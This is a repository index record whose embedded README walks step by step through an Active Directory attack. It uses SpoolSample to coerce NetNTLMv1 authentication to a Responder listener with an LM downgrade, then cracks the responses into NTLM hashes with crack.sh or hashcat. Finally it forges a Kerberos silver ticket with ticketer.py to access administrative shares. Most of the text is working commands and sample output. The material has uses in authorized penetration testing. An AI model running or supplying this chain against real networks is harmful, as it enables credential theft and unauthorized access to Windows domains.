{"id":13842798,"url":"https://github.com/NotMedic/NetNTLMtoSilverTicket","last_synced_at":"2025-07-11T15:33:11.561Z","repository":{"id":41364408,"uuid":"165685550","full_name":"NotMedic/NetNTLMtoSilverTicket","owner":"NotMedic","description":"SpoolSample -\u003e Responder w/NetNTLM Downgrade -\u003e NetNTLMv1 -\u003e NTLM -\u003e Kerberos Silver Ticket","archived":false,"fork":false,"pushed_at":"2021-07-26T15:16:20.000Z","size":20,"stargazers_count":725,"open_issues_count":0,"forks_count":112,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-08-05T17:33:19.703Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NotMedic.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-01-14T15:32:27.000Z","updated_at":"2024-07-29T15:34:45.000Z","dependencies_parsed_at":"2022-08-25T08:11:33.556Z","dependency_job_id":null,"html_url":"https://github.com/NotMedic/NetNTLMtoSilverTicket","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NotMedic%2FNetNTLMtoSilverTicket/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NotMedic","download_url":"https://codeload.github.com/NotMedic/NetNTLMtoSilverTicket/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225737132,"owners_count":17516293,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:01:46.529Z","updated_at":"2024-11-21T13:31:09.974Z","avatar_url":"https://github.com/NotMedic.png","language":"PowerShell","readme":"# SpoolSample -\u003e NetNTLMv1 -\u003e NTLM -\u003e Silver Ticket\r\n\r\nThis technique has been alluded to by others, but I haven't seen anything cohesive out there.  Below we'll walk through the steps of obtaining NetNTLMv1 Challenge/Response authentication, cracking those to NTLM Hashes, and using that NTLM Hash to sign a Kerberos Silver ticket.\r\n\r\nThis will work on networks where \"LAN Manager authentication level\" is set to 2 or less. This is a fairly common scenario in older, larger Windows deployments.  It should not work on Windows 10 / Server 2016 or newer.\r\n\r\n## There are 3 main steps\r\n\r\nObtain a NetNTLMv1 Response of a machine account vis @tifkin_'s (Lee Christensen's) SpoolSample\r\n\r\nCrack that NetNTLMv1 Response back into an NTLM Hash using @0x31337's (David Hulton's) Rainbow Tables\r\n\r\nGenerate a Silver Ticket using the newly obtained NTLM Hash using @agsolino's (Albert Solino's) ticketer.py\r\n\r\n## Obtain a NetNTLMv1 Response\r\n\r\n### Identify potentially vulnerable machines\r\n\r\nUsing Powershell, get a list of Windows boxes. Servers are usually priority, so lets focus there:\r\n\r\n    Get-ADComputer -Filter {(OperatingSystem -like \"*windows*server*\") -and (OperatingSystem -notlike \"2016\") -and (Enabled -eq \"True\")} -Properties * | select Name | ft -HideTableHeaders \u003e servers.txt\r\n\r\nUsing a slightly modified @mysmartlogin's (Vincent Le Toux's) SpoolerScanner, see if the Spooler Service is listening\r\n\r\n    . .\\Get-SpoolStatus.ps1\r\n    ForEach ($server in Get-Content servers.txt) {Get-SpoolStatus $server}\r\n\r\nYou can also use rpcdump.py on Linux and look for the MS-RPRN Protocol\r\n\r\n    rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN\r\n\r\n### Start Responder with the --lm flag to force a LM downgrade\r\n\r\n    ./Responder.py -I eth0 --lm\r\n\r\n### Trigger an authentication\r\n\r\n    SpoolSample.exe TARGET RESPONDERIP\r\n\r\nor use 3xocyte's dementor.py if you're on Linux\r\n\r\n    python dementor.py -d domain -u username -p password RESPONDERIP TARGET\r\n\r\nExample Response:\r\n\r\n```bash\r\n[SMB] NTLMv1 Client   : 10.0.0.2\r\n[SMB] NTLMv1 Username : DOMAIN\\SERVER$\r\n[SMB] NTLMv1 Hash     : SERVER$::DOMAIN:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972:1122334455667788\r\n```\r\n\r\n## Crack the NetNTLMv1 responses back into an NTLM Hash\r\n\r\nYou can use a set of Rainbow Tables to reverse the NTHASH to NTLM, or you can reverse it to its DES constituent components and crack it with hashcat.  \r\n\r\nAn 8x 1080 rig can brute force it in about 6 days, so consider Rainbow Tables.\r\n\r\n### Rainbow Tables\r\n\r\n1. For Rainbow Tables, there is a service hosted at [https://crack.sh/netntlm/](https://crack.sh/netntlm/) that will recover NTLM from NetNTLMv1 for free. This is provided by David Hulton of Toorcon.  We're working on a local copy of the rainbow tables and software that does not require and FPGA for lookups.\r\n\r\n2. For crack.sh, the format is\r\n     NTHASH:(response), so NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 from the example.\r\n\r\n### Or Cracking Them with hashcat\r\n\r\n1. @evil_mog's [ntlmv1-multi](https://github.com/evilmog/ntlmv1-multi) tool below can break them\r\n\r\n```bash\r\npython3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788\r\n```\r\n\r\nThis will return the below output with instructions:\r\n\r\n```bash\r\n['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']\r\n\r\nHostname: DUSTIN-5AA37877\r\nUsername: hashcat\r\nChallenge: 1122334455667788\r\nLM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D\r\nNT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595\r\nCT1: 727B4E35F947129E\r\nCT2: A52B9CDEDAE86934\r\nCT3: BB23EF89F50FC595\r\n\r\nTo Calculate final 4 characters of NTLM hash use:\r\n./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788\r\n\r\nTo crack with hashcat create a file with the following contents:\r\n727B4E35F947129E:1122334455667788\r\nA52B9CDEDAE86934:1122334455667788\r\n\r\nTo crack with hashcat:\r\n./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1\r\n\r\nTo Crack with crack.sh use the following token\r\nNTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595\r\n```\r\n\r\n## Create a Kerberos Silver Ticket\r\n\r\nYou'll need to find a few pieces of information for this: SPN of the service you want to access, domain SID, domain user account SID and account name with local admin access, and a domain group that user is a member of if it's group-based local admin.\r\n\r\nFor the service, the most common will be cifs/ as it maps back to the HOST/ service\r\n\r\n### Generate a Silver Ticket using Impacket's ticketer.py\r\n\r\n```bash\r\n./ticketer.py -nthash 09e55a127f3d4e4957c77de30000502a -domain-sid S-1-5-21-7375663-6890924511-1272660413 -domain DOMAIN.COM -spn cifs/SERVER.DOMAIN.COM -user-id 123456 -groups 4321 username\r\n```\r\n\r\n### Set the generated ccache file to the appropriate environment variable\r\n\r\n```bash\r\nexport KRB5CCNAME=/root/Assessments/NTLMTest/USERNAME.ccache\r\n```\r\n\r\n### Use smbclient, wmiexec,  psexec, or any other impacket tool\r\n\r\n```bash\r\nsmbclient -k //SERVER.DOMAIN.COM/c$ -d\r\n```\r\n\r\n## Work left to do\r\n\r\n* Distribute 6TB of Rainbow Tables\r\n  * Torrent w/@0x31337's Permission?\r\n  * DEF CON Data Duplication Village?\r\n\r\n* Modify @0x31337's [desrtop](https://github.com/h1kari/desrtop) to not require an FPGA\r\n  * Outside my personal wheelhouse, but I'm grinding anyway\r\n\r\n* Identify more ways to trigger a machine account authentication remotely\r\n  * xp_dirtree is another path\r\n  * Anyone willing to share others they may have found?\r\n","funding_links":[],"categories":["PowerShell","PowerShell (153)","Operating Systems"],"sub_categories":["Windows"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNotMedic%2FNetNTLMtoSilverTicket/lists"}